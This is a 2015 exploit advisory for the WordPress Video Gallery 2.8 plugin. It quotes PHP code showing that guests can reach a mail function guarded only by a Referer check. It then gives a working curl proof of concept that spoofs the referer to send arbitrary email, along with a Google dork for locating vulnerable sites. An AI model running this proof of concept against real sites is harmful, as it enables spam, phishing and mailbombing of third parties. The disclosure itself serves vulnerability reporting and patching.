WordPress Video Gallery 2.8 Unprotected Mail Page

`######################  
  
# Exploit Title : Wordpress Video Gallery 2.8 Unprotected Mail Page  
  
# Exploit Author : Claudio Viviani  
  
# Website Author: http://www.homelab.it  
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)  
  
# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery  
  
# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip  
  
# Dork Google: index of "contus-video-gallery"  
  
  
# Date : 2015-04-05  
  
# Tested on : Windows 7 / Mozilla Firefox  
Linux / Mozilla Firefox   
  
######################  
  
# Description  
  
Wordpress Video Gallery 2.8 suffers from Unprotected Mail Page.  
  
This vulnerability is exploitable to dos, phishing, mailbombing, spam...  
  
The "email" ajax action is callable from any guest visitor (/contus-video-gallery/hdflvvideoshare.php)  
  
/**  
* Email function  
*/  
add_action( 'wp_ajax_email', 'email_function' );  
add_action( 'wp_ajax_nopriv_email', 'email_function' );  
  
function email_function() {  
require_once( dirname( __FILE__ ) . '/email.php' );  
die();  
}  
  
Any user can send email from /contus-video-gallery/email.php to any recipients.  
  
The variables used to send emails are:  
  
$to = filter_input( INPUT_POST, 'to', FILTER_VALIDATE_EMAIL );  
$from = filter_input( INPUT_POST, 'from', FILTER_VALIDATE_EMAIL );  
$url = filter_input( INPUT_POST, 'url', FILTER_VALIDATE_URL );  
$subject = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );  
$message_content = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );  
$title = filter_input( INPUT_POST, 'title', FILTER_SANITIZE_STRING );  
$referrer = parse_url( $_SERVER['HTTP_REFERER'] );  
$referrer_host = $referrer['scheme'] . '://' . $referrer['host'];  
$pageURL = 'http';  
  
It assumes that if the provided “Referrer” field fits the website’s URL, then it’s okay to send this email:  
  
if ( $referrer_host === $pageURL ) {  
$headers = "MIME-Version: 1.0" . "\r\n";  
$headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";   
$headers .= "From: " . "<" . $from . ">\r\n";  
$headers .= "Reply-To: " . $from . "\r\n";  
$headers .= "Return-path: " . $from;  
$username = explode('@' , $from );   
$username = ucfirst($username['0']);  
$subject = $username . ' has shared a video with you.';  
$emailtemplate_path = plugin_dir_url( __FILE__ ).'front/emailtemplate/Emailtemplate.html';   
$message = file_get_contents( $emailtemplate_path);  
$message = str_replace( '{subject}', $subject, $message );  
$message = str_replace( '{message}', $message_content, $message);  
$message = str_replace( '{videourl}',$url,$message );  
$message = str_replace('{username}',$username ,$message );  
if ( @mail( $to, $title, $message, $headers ) ) {  
echo 'success=sent';  
} else {  
echo 'success=error';  
}  
} else {  
echo 'success=error';  
}  
  
The “Referer” field can easily be modified by the attacker!  
  
######################  
  
# PoC  
  
curl -X POST -d "[email protected]&[email protected]&Note=BodyMessage&title=Subject&url=http://www.homelab.it" \  
-e http://127.0.0.1 http://127.0.0.1/wp-admin/admin-ajax.php?action=email  
  
cUrl switch "-e" spoof referer address  
  
# Http Response  
  
success=sent   
  
# Poc Video  
  
http://youtu.be/qgOGPm1-tNc  
  
  
#######################  
  
Discovered By : Claudio Viviani  
http://www.homelab.it  
http://archive-exploit.homelab.it/1 (Full HomelabIT Archive Exploit)  
http://ffhd.homelab.it (Free Fuzzy Hashes Database)  
  
[email protected]  
[email protected]  
  
https://www.facebook.com/homelabit  
https://twitter.com/homelabit  
https://plus.google.com/+HomelabIt1/  
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww  
  
#####################  
`